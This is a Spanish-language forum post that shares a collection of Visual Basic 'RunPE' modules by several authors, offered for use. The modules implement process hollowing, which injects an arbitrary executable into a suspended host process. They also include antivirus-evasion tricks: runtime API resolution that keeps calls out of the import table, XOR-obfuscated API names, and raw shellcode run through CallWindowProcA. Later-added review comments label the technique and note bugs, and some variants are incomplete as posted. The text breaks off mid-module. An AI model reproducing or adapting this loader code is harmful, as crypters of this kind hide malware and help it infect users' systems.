
Visual Basic Recoleccion de RunPe


Expermicid

Hola a todos

Vengo a dejarles esta recolección de RunPe que encontré en dekoders.

La recolección fue hecha por DarkCompany96.

Espero que les sirva.

Aqui va:

By Jhonjhon_123

[lenguaje=vb]Option Explicit

' ****************************************************************************************************************************** '

'

' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)

' --- Descripción: RunPe + CallApiByName

' --- Distribución: Libre

' --- Terminos De Uso:

' --- Prohibida su comercialización.

' --- No Debe eliminar los creditos.

'

' --- Funciones:

' --- IniciarDDLL()

' - Inicializa la configuración

'

' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)

' - RunPE

' * sName: Ruta al exe

' * bBytes: Bytes a ejecutar

'

' ****************************************************************************************************************************** '

' --- Win32 imports -------------------------------------------------------
' RtlMoveMemory is used with "ByVal lPtr" to write immediate values into a
' local byte array (see Call_). CallWindowProcA is never given a real window
' procedure: both MoveMemory and Call_ pass the address of a byte array as
' its first argument, i.e. it is used as a "call this address" primitive.
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)

Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long

' Used only by Call_ to resolve the export that the generated stub calls.
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

' 37-byte module-level buffer filled by IniciarDDLL and executed (through
' CallWindowProcA) by MoveMemory.
Dim bMoveMem(36) As Byte

' Copies a fixed sequence of 37 byte values into bMoveMem. MoveMemory later
' executes that buffer as native code (CallWindowProcA on its address), so
' this must run before MoveMemory / ExecuteBytes; until then bMoveMem is all
' zeros. The literal has exactly 37 entries, matching Dim bMoveMem(36);
' adding an entry would overrun the array.
Public Sub IniciarDDLL()

Dim vTMP As Variant

Dim D As Long

' D is the write index into bMoveMem; CByte narrows each Variant element.
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)

bMoveMem(D) = CByte(vTMP): D = D + 1

Next

End Sub

'By Cobein

' Calls an exported function by library/export name with a variable
' argument list, without a compile-time Declare for it.
' Parameters:
'   sLib   - DLL name handed to LoadLibraryA.
'   sMod   - export name handed to GetProcAddress.
'   Params - arguments; each is coerced with CLng and emitted last-to-first
'            so the first Param ends up on top of the stack (stdcall order).
' Returns the callee's result as returned by CallWindowProcA, or 0 when the
' export cannot be resolved - callers cannot tell a 0 result from a failed
' lookup.
' How it works: a small x86 stub is assembled at runtime in the local array
' bvASM - fixed prologue bytes, then one "68 imm32" (PUSH) per parameter,
' then "E8 rel32" (CALL) whose displacement is taken relative to the byte
' after the displacement field (lMod - lPtr - 4), then "C3" (RET) - and
' executed by passing its address to CallWindowProcA.
' Review notes: On Error Resume Next hides every runtime error, including a
' failed CLng coercion of a Param; bvASM is a 0xEC00-byte stack array of
' which only a few dozen bytes are used; the stub is executed from ordinary
' writable data without any protection change.
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long

On Error Resume Next

Dim lPtr As Long

Dim bvASM(&HEC00& - 1) As Byte

Dim i As Long

Dim lMod As Long

' Resolve the target; a failed LoadLibraryA makes GetProcAddress return 0 too.
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)

If lMod = 0 Then Exit Function

' lPtr is the write cursor into the stub.
lPtr = VarPtr(bvASM(0))

' Fixed prologue: 4 + 2 bytes.
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4

RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2

' One 5-byte PUSH imm32 per parameter, last parameter first.
For i = UBound(Params) To 0 Step -1

RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1

RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4

Next

' CALL rel32: displacement measured from the end of the 5-byte instruction.
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1

RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4

' RET
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1

' Transfer control to the stub; the four CallWindowProcA arguments are 0 here.
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)

End Function

' By Strike Bot

' Memory copy primitive used throughout ExecuteBytes (destination address,
' source address, byte count). It works by executing the bMoveMem buffer
' through CallWindowProcA: the buffer's address takes the "window proc"
' slot and the three copy arguments plus a 0 fill the message parameters.
' IniciarDDLL must have filled bMoveMem first. All arguments are raw
' addresses; nothing validates them.
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)

Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)

End Sub

' By Jhonjhon_123

' Process hollowing ("RunPE"): starts sName as a suspended process, unmaps
' its original image and writes the PE image held in bBytes at that image's
' preferred base, then points the main thread at the new entry point and
' resumes it. The API chain CreateProcessW(CREATE_SUSPENDED = &H4) ->
' NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
' WriteProcessMemory -> GetThreadContext/SetThreadContext -> ResumeThread is
' the pattern catalogued as MITRE ATT&CK T1055.012 (Process Hollowing).
' Every API is resolved at runtime through Call_ rather than a Declare, so
' none of them appears in the import table.
' Parameters:
'   sName  - path of the host executable (passed as StrPtr to CreateProcessW).
'   bBytes - raw PE image; header fields are read at fixed 32-bit PE offsets.
' Review notes (behaviour as written):
'  - On Error Resume Next masks every failure, and the results of
'    CreateProcessW, VirtualAllocEx and WriteProcessMemory are discarded.
'  - Unlike the other variants on this page there is no MZ/PE signature
'    check, and e_lfanew / PointerToRawData index bBytes without any bounds
'    check against UBound(bBytes).
'  - No relocation processing exists, so the image must be usable at its
'    preferred ImageBase.
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)

On Error Resume Next

Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER

Dim bInh(247) As Byte ' IMAGE_NT_HEADERS

Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER

Dim bPi(15) As Byte ' PROCESS_INFORMATION

Dim bSi(67) As Byte ' STARTUPINFO

Dim bCtx(203) As Byte ' CONTEXT86

Dim e_lfanew As Long

Dim ImageBase As Long

Dim hProcess As Long

Dim hThread As Long

Dim SizeOfImage As Long

Dim SizeOfHeaders As Long

Dim AddressOfEntryPoint As Long

Dim NumberOfSections As Integer

Dim VirtualAddress As Long

Dim PointerToRawData As Long

Dim SizeOfRawData As Long

Dim Ebx As Long

Dim Eax As Long

Dim lTemp As Long

Dim D As Long

' STARTUPINFO.cb = 68 (the size of bSi).
lTemp = 68

MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&

' CONTEXT.ContextFlags = &H10007 (CONTEXT_FULL; see the cNtPEL constants below).
lTemp = &H10007

MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&

' Pull the needed fields straight out of the raw headers:
' DOS header is 64 bytes, e_lfanew at +60; NT headers are 248 bytes with
' NumberOfSections at +6, AddressOfEntryPoint +40, ImageBase +52,
' SizeOfImage +80 and SizeOfHeaders +84 (PE32 layout).
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&

MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&

MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&

MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&

MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&

MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&

MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&

MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&

' Host process created suspended (&H4 = CREATE_SUSPENDED); bPi receives
' hProcess at +0 and hThread at +4.
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))

MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&

MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&

' Unmap whatever the host had at the payload's preferred base.
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)

' &H1000 Or &H2000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)

' Headers first, then each section at ImageBase + VirtualAddress.
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)

' Section table follows the NT headers: 40-byte entries with
' VirtualAddress at +12, SizeOfRawData +16 and PointerToRawData +20.
For D = 0 To NumberOfSections - 1

MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&

MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&

MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&

MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&

Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)

Next

Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))

' CONTEXT+164 is Ebx. NOTE(review): the write to Ebx+8 assumes Ebx holds
' the PEB address in the suspended main thread (PEB+8 = ImageBaseAddress) -
' a convention, not verified here.
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&

Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)

' CONTEXT+176 is Eax, set to the new entry point; presumably the register
' the thread start-up path jumps through - not verified here.
lTemp = ImageBase + AddressOfEntryPoint

MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&

' Apply the modified context and let the main thread run.
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))

Call Call_("kernel32", "ResumeThread", hThread)

End Sub[/lenguaje]

Modded KrunPE

[lenguaje=vb]' "Modded KrunPE": the same hollowing sequence as ExecuteBytes above
' (MITRE ATT&CK T1055.012), but every Win32/Nt call goes through
' Geheim(lib, export, ...) - a dynamic-call helper that is NOT included in
' this post - and the PE header fields are read with GetNumb, which is an
' NtWriteVirtualMemory into the current process (handle -1). After
' CreateProcessW only the Nt* variants are used.
' Parameters:
'   bvBuff   - raw PE image; checked for the MZ (&H5A4D) and PE (&H4550) signatures.
'   sHost    - host executable path.
'   sParams  - accepted but never passed on (CreateProcessW's third argument is 0).
'   hProcess - receives the new process handle.
' Returns 1 after the sequence, 0 if either signature check fails; none of
' the Geheim results is checked. CLng("0") and friends are literal
' constants wrapped in a string conversion (presumably to vary the compiled
' byte pattern); they have no functional role.
' Review notes: the literal "kernel32"/"NTDLL" strings and the kernel32/NTDLL
' variables are mixed inconsistently, and kernel32 is assigned but never
' used. VarPtr(GetNumb(...)) on the NtAllocateVirtualMemory line takes the
' address of a temporary - it relies on VB keeping that temporary alive for
' the duration of the call.
Public Function Inject(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long

Dim hModuleBase As Long

Dim hPE As Long

Dim hSec As Long

Dim ImageBase As Long

Dim i As Long

' 17 Longs = 68 bytes (STARTUPINFO), 4 Longs (PROCESS_INFORMATION:
' hProcess at index 0, hThread at 1), 51 Longs = 204 bytes (CONTEXT).
Dim tSTARTUPINFO(16) As Long

Dim tPROCESS_INFORMATION(3) As Long

Dim tCONTEXT(50) As Long

Dim kernel32 As String

Dim NTDLL As String

kernel32 = "KERNEL32"

NTDLL = "NTDLL"

hModuleBase = VarPtr(bvBuff(CLng("0")))

' "MZ" check on the first two bytes.
If Not GetNumb(hModuleBase, CLng("2")) = &H5A4D Then Exit Function

' e_lfanew at +&H3C gives the NT headers; "PE\0\0" check.
hPE = hModuleBase + GetNumb(hModuleBase + &H3C)

If Not GetNumb(hPE) = &H4550 Then Exit Function

' OptionalHeader.ImageBase at NT headers +&H34.
ImageBase = GetNumb(hPE + &H34)

' STARTUPINFO.cb = &H44 (68).
tSTARTUPINFO(CLng("0")) = &H44

' &H4 = CREATE_SUSPENDED.
Call Geheim("kernel32", "CreateProcessW", CLng("0"), StrPtr(sHost), CLng("0"), CLng("0"), CLng("0"), &H4, CLng("0"), CLng("0"), VarPtr(tSTARTUPINFO(CLng("0"))), VarPtr(tPROCESS_INFORMATION(CLng("0"))))

Call Geheim("NTDLL", "NtUnmapViewOfSection", tPROCESS_INFORMATION(CLng("0")), ImageBase)

' SizeOfImage at +&H50; &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Call Geheim("NTDLL", "NtAllocateVirtualMemory", tPROCESS_INFORMATION(CLng("0")), VarPtr(ImageBase), CLng("0"), VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)

' Headers (SizeOfHeaders at +&H54), then each section.
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase, VarPtr(bvBuff(CLng("0"))), GetNumb(hPE + &H54), CLng("0"))

' NumberOfSections at +&H6; section table at +&HF8, &H28 bytes per entry
' (VirtualAddress +&HC, SizeOfRawData +&H10, PointerToRawData +&H14).
For i = CLng("0") To GetNumb(hPE + &H6, 2) - CLng("1")

hSec = hPE + &HF8 + (&H28 * i)

Call Geheim(NTDLL, "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), CLng("0"))

Next i

' ContextFlags = CONTEXT_FULL.
tCONTEXT(CLng("0")) = &H10007

Call Geheim("NTDLL", "NtGetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))

' Long index 41 = byte offset 164 = Ebx. NOTE(review): assumes Ebx holds the
' PEB address (PEB+8 = ImageBaseAddress) - convention, not verified here.
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), tCONTEXT(CLng("41")) + &H8, VarPtr(ImageBase), &H4, CLng("0"))

' Long index 44 = byte offset 176 = Eax; AddressOfEntryPoint at +&H28.
tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)

Call Geheim("NTDLL", "NtSetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))

Call Geheim("NTDLL", "NtResumeThread", tPROCESS_INFORMATION(CLng("1")), CLng("0"))

hProcess = tPROCESS_INFORMATION(CLng("0"))

Inject = CLng("1")

End Function

' Reads lSize bytes (default 4) from address lPtr into this function's own
' return variable, by asking NtWriteVirtualMemory to write into the current
' process (-1 is the current-process pseudo handle). Effectively the memory
' read used for every PE header access in Inject. With lSize = 2 the upper
' bytes of the returned Long stay 0.
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long

Call Geheim("NTDLL", "NtWriteVirtualMemory", -1, VarPtr(GetNumb), lPtr, lSize, CLng("0"))

End Function[/lenguaje]

Modded RunPE by f0rce

[lenguaje=vb]' "Modded RunPE by f0rce": library and export names are run through
' XORDecryption(name, sEKey) before each CallApi. As posted, the constants
' are plain text rather than the hex-pair/XOR form XORDecryption decodes
' (see that function below), so the decoded names would not be valid.
' sEKey is the XOR key.
Private Const sKernel32Lib As String = "KERNEL32"

Private Const sNtdlllib As String = "NTDLL"

Private Const sCreateProcessW As String = "CreateProcessW"

Private Const sNtUnmapViewOfSection As String = "NtUnmapViewOfSection"

Private Const sNtAllocateVirtualMemory As String = "NtAllocateVirtualMemory"

Private Const sNtWriteVirtualMemory As String = "NtWriteVirtualMemory"

Private Const sNtGetContextThread As String = "NtGetContextThread"

Private Const sNtSetContextThread As String = "NtSetContextThread"

Private Const sNtResumeThread As String = "NtResumeThread"

Private Const sEKey As String = "Passwort"

' Same hollowing sequence as Inject above (MITRE ATT&CK T1055.012; see the
' comments there for the PE offsets and CONTEXT indices). Differences:
' every call goes through CallApi with XOR-"decrypted" names, sParams is
' passed as CreateProcessW's third argument, and the kernel32/NTDLL string
' variables are declared but never assigned or used.
' As posted this variant cannot run: CallApi (below) is an empty stub with
' no parameter list (VB6 rejects calls that pass more arguments than the
' declaration), and the name constants are not in the form XORDecryption
' decodes. Returns 1 after the sequence, 0 if the MZ/PE check fails; no
' CallApi result is checked.
Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long

Dim hModuleBase As Long

Dim hPE As Long

Dim hSec As Long

Dim ImageBase As Long

Dim i As Long

Dim tSTARTUPINFO(16) As Long

Dim tPROCESS_INFORMATION(3) As Long

Dim tCONTEXT(50) As Long

Dim kernel32 As String

Dim NTDLL As String

hModuleBase = VarPtr(bvBuff(0))

' "MZ" and "PE\0\0" signature checks.
If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function

hPE = hModuleBase + GetNumb(hModuleBase + &H3C)

If Not GetNumb(hPE) = &H4550 Then Exit Function

ImageBase = GetNumb(hPE + &H34)

tSTARTUPINFO(0) = &H44

' &H4 = CREATE_SUSPENDED; StrPtr(sParams) goes in as the command line.
Call CallApi(XORDecryption(sKernel32Lib, sEKey), XORDecryption(sCreateProcessW, sEKey), 0, StrPtr(sHost), StrPtr(sParams), 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtUnmapViewOfSection, sEKey), tPROCESS_INFORMATION(0), ImageBase)

' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtAllocateVirtualMemory, sEKey), tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)

' Copy each section (table at +&HF8, &H28 bytes per entry).
For i = 0 To GetNumb(hPE + &H6, 2) - 1

hSec = hPE + &HF8 + (&H28 * i)

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)

Next i

tCONTEXT(0) = &H10007

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtGetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))

' tCONTEXT(41) = Ebx (see the note in Inject); tCONTEXT(44) = Eax.
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)

tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtSetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtResumeThread, sEKey), tPROCESS_INFORMATION(1), 0)

hProcess = tPROCESS_INFORMATION(0)

RunPE = 1

End Function

' Memory read used for the PE header accesses in RunPE: asks
' NtWriteVirtualMemory (through CallApi) to copy lSize bytes, default 4,
' from lPtr into this function's own return variable; -1 is the
' current-process pseudo handle. Depends on the empty CallApi stub below.
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long

Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), -1, VarPtr(GetNumb), lPtr, lSize, 0)

End Function

' Empty placeholder: the dynamic-call helper this module expects (compare
' Call_ and Invoke elsewhere on this page) was not included in the post, so
' RunPE and GetNumb above do not work as posted. Left as found.
Public Function CallApi()

End Function

Public Function XORDecryption(DataIn As String, CodeKey As String) As String

' Decodes DataIn as consecutive two-character hex pairs and XORs each byte
' with a character of CodeKey. The key is cycled: pair number n uses key
' character (n Mod Len(CodeKey)) + 1, so with a multi-character key the
' first pair is combined with the SECOND key character.
' Parameters:
'   DataIn  - hex-pair string, e.g. "2A"; Val yields 0 for non-hex input.
'   CodeKey - XOR key; must be non-empty (Mod by 0 raises a runtime error).
' Returns the decoded string ("" for empty DataIn).

Dim nPair As Long

Dim sPair As String

Dim nByte As Integer

Dim nKey As Integer

Dim sResult As String

For nPair = 1 To (Len(DataIn) / 2)

sPair = Mid$(DataIn, (2 * nPair) - 1, 2)

nByte = Val("&H" & sPair)

nKey = Asc(Mid$(CodeKey, ((nPair Mod Len(CodeKey)) + 1), 1))

sResult = sResult & Chr(nByte Xor nKey)

Next nPair

XORDecryption = sResult

End Function[/lenguaje]

Cobein RunPe

[lenguaje=vb]'---------------------------------------------------------------------------------------

' Module : cNtPEL

' DateTime : 30/06/2009 06:32

' Author : Cobein

' Purpose : Inject Exe

' Usage : At your own risk

' Requirements: None

' Distribution: You can freely use this code in your own

' applications, but you may not reproduce

' or publish this code on any web site,

' online service, or distribute as source

' on any media without express permission.

'

' Thanks to : This is gonna be a looong list xD

' Batfitch - kernel base asm

' Karcrack - For helping me to debug and test it

' Paul Caton - vTable patch examples

' rm_code - First call api prototype

' and different books and pappers

'

' Compile : P-Code !!!

'

' Comments : Coded on top of the invoke module.

'

'---------------------------------------------------------------------------------------

Option Explicit

' PE constants (32-bit layout): signatures ("MZ", "PE\0\0") and header sizes
' used as CpyMem lengths.
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&

Private Const IMAGE_NT_SIGNATURE As Long = &H4550&

Private Const SIZE_DOS_HEADER As Long = &H40

Private Const SIZE_NT_HEADERS As Long = &HF8

Private Const SIZE_EXPORT_DIRECTORY As Long = &H28

Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28

' Hex-encoded machine code that PutThunk copies into c_bvASM (two hex
' characters per byte). THUNK_APICALL is the call stub Invoke patches;
' THUNK_KERNELBASE is run once from Class_Initialize and its result, kept in
' c_lKrnl, is then used as a module handle for GetProcAddress.
Private Const THUNK_APICALL As String = "8B4C240851E85989016631C0C3"

Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"

' Placeholders Invoke replaces inside THUNK_APICALL with the pushed
' parameters (PATCH1) and the call displacement (PATCH2). As posted both are
' empty strings, and Replace() with an empty Find returns its input
' unchanged - so the stub is never actually patched.
Private Const PATCH1 As String = ""

Private Const PATCH2 As String = ""

' Win32 flag values, named as in the SDK.
Private Const CONTEXT_FULL As Long = &H10007

Private Const CREATE_SUSPENDED As Long = &H4

Private Const MEM_COMMIT As Long = &H1000

Private Const MEM_RESERVE As Long = &H2000

Private Const PAGE_EXECUTE_READWRITE As Long = &H40

' Win32 STARTUPINFO (68 bytes on 32-bit). RunPE only sets cb; the rest is
' left zeroed.
Private Type STARTUPINFO

cb As Long

lpReserved As Long

lpDesktop As Long

lpTitle As Long

dwX As Long

dwY As Long

dwXSize As Long

dwYSize As Long

dwXCountChars As Long

dwYCountChars As Long

dwFillAttribute As Long

dwFlags As Long

wShowWindow As Integer

cbReserved2 As Integer

lpReserved2 As Long

hStdInput As Long

hStdOutput As Long

hStdError As Long

End Type

' Win32 PROCESS_INFORMATION, filled by CreateProcessW; RunPE uses hProcess
' and hThread and never closes either handle.
Private Type PROCESS_INFORMATION

hProcess As Long

hThread As Long

dwProcessID As Long

dwThreadID As Long

End Type

' x87 state embedded in CONTEXT (7 Longs + 80 bytes + 1 Long = 112 bytes);
' present only so the CONTEXT field offsets line up.
Private Type FLOATING_SAVE_AREA

ControlWord As Long

StatusWord As Long

TagWord As Long

ErrorOffset As Long

ErrorSelector As Long

DataOffset As Long

DataSelector As Long

RegisterArea(1 To 80) As Byte

Cr0NpxState As Long

End Type

' x86 thread CONTEXT (204 bytes as declared; the SDK struct additionally
' has a 512-byte ExtendedRegisters area that is omitted here). Field order
' must match the OS layout because NtGetContextThread fills it directly.
' RunPE reads Ebx (offset 164) and writes Eax (offset 176).
Private Type CONTEXT

ContextFlags As Long

Dr0 As Long

Dr1 As Long

Dr2 As Long

Dr3 As Long

Dr6 As Long

Dr7 As Long

FloatSave As FLOATING_SAVE_AREA

SegGs As Long

SegFs As Long

SegEs As Long

SegDs As Long

Edi As Long

Esi As Long

Ebx As Long

Edx As Long

Ecx As Long

Eax As Long

Ebp As Long

Eip As Long

SegCs As Long

EFlags As Long

Esp As Long

SegSs As Long

End Type

' Legacy DOS header (64 bytes). Only e_magic ("MZ" check) and e_lfanew (file
' offset of the NT headers) are used by this module.
Private Type IMAGE_DOS_HEADER

e_magic As Integer

e_cblp As Integer

e_cp As Integer

e_crlc As Integer

e_cparhdr As Integer

e_minalloc As Integer

e_maxalloc As Integer

e_ss As Integer

e_sp As Integer

e_csum As Integer

e_ip As Integer

e_cs As Integer

e_lfarlc As Integer

e_ovno As Integer

e_res(0 To 3) As Integer

e_oemid As Integer

e_oeminfo As Integer

e_res2(0 To 9) As Integer

e_lfanew As Long

End Type

' COFF file header; NumberOfSections drives the section-copy loop in RunPE.
Private Type IMAGE_FILE_HEADER

Machine As Integer

NumberOfSections As Integer

TimeDateStamp As Long

PointerToSymbolTable As Long

NumberOfSymbols As Long

SizeOfOptionalHeader As Integer

Characteristics As Integer

End Type

' RVA/size pair. DataDirectory(0) is the export table, which the custom
' GetProcAddress walks.
Private Type IMAGE_DATA_DIRECTORY

VirtualAddress As Long

Size As Long

End Type

' PE32 optional header. Fields used here: AddressOfEntryPoint, ImageBase,
' SizeOfImage, SizeOfHeaders and DataDirectory(0).
Private Type IMAGE_OPTIONAL_HEADER

Magic As Integer

MajorLinkerVersion As Byte

MinorLinkerVersion As Byte

SizeOfCode As Long

SizeOfInitializedData As Long

SizeOfUnitializedData As Long

AddressOfEntryPoint As Long

BaseOfCode As Long

BaseOfData As Long

ImageBase As Long

SectionAlignment As Long

FileAlignment As Long

MajorOperatingSystemVersion As Integer

MinorOperatingSystemVersion As Integer

MajorImageVersion As Integer

MinorImageVersion As Integer

MajorSubsystemVersion As Integer

MinorSubsystemVersion As Integer

W32VersionValue As Long

SizeOfImage As Long

SizeOfHeaders As Long

CheckSum As Long

SubSystem As Integer

DllCharacteristics As Integer

SizeOfStackReserve As Long

SizeOfStackCommit As Long

SizeOfHeapReserve As Long

SizeOfHeapCommit As Long

LoaderFlags As Long

NumberOfRvaAndSizes As Long

DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY

End Type

' "PE\0\0" signature + file header + optional header; SIZE_NT_HEADERS (&HF8)
' bytes are copied into it.
Private Type IMAGE_NT_HEADERS

Signature As Long

FileHeader As IMAGE_FILE_HEADER

OptionalHeader As IMAGE_OPTIONAL_HEADER

End Type

' Export directory (&H28 bytes). GetProcAddress walks NumberOfNames entries
' of lpAddressOfNames, maps through lpAddressOfNameOrdinals, and reads the
' function RVA from lpAddressOfFunctions.
Private Type IMAGE_EXPORT_DIRECTORY

Characteristics As Long

TimeDateStamp As Long

MajorVersion As Integer

MinorVersion As Integer

lpName As Long

Base As Long

NumberOfFunctions As Long

NumberOfNames As Long

lpAddressOfFunctions As Long

lpAddressOfNames As Long

lpAddressOfNameOrdinals As Long

End Type

' Section table entry (&H28 bytes). VirtualAddress, SizeOfRawData and
' PointerToRawData map file bytes to their in-memory location in RunPE.
Private Type IMAGE_SECTION_HEADER

SecName As String * 8

VirtualSize As Long

VirtualAddress As Long

SizeOfRawData As Long

PointerToRawData As Long

PointerToRelocations As Long

PointerToLinenumbers As Long

NumberOfRelocations As Integer

NumberOfLinenumbers As Integer

Characteristics As Long

End Type

' RtlMoveMemory is the only statically imported API in this module; every
' other call is made through Invoke.
Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)

' c_lKrnl: result of running THUNK_KERNELBASE in Class_Initialize, used as a
' module handle for GetProcAddress. c_lLoadLib: LoadLibraryW resolved from
' it. c_bInit: True once both are non-zero.
Private c_lKrnl As Long

Private c_lLoadLib As Long

Private c_bInit As Boolean

' c_lVTE / c_lOldVTE: vtable slot address and its saved original content,
' managed by PatchCall.
Private c_lVTE As Long

Private c_lOldVTE As Long

' 256-byte buffer holding the current thunk (filled by PutThunk).
Private c_bvASM(&HFF) As Byte

' Placeholder method whose vtable slot PatchCall temporarily redirects to
' c_bvASM: calling zDoNotCall while the patch is in place dispatches into
' the thunk instead of this empty body. It must remain the first public
' procedure so that its slot is the one at vtable + &H1C that PatchCall
' patches (&H1C = 7 slots * 4, i.e. right after IUnknown/IDispatch).
' Never call it directly.
Public Function zDoNotCall() As Long

'This function will be replaced with machine code laterz

'Do not add any public procedure on top of it

End Function

' Process hollowing (MITRE ATT&CK T1055.012), same sequence as the other
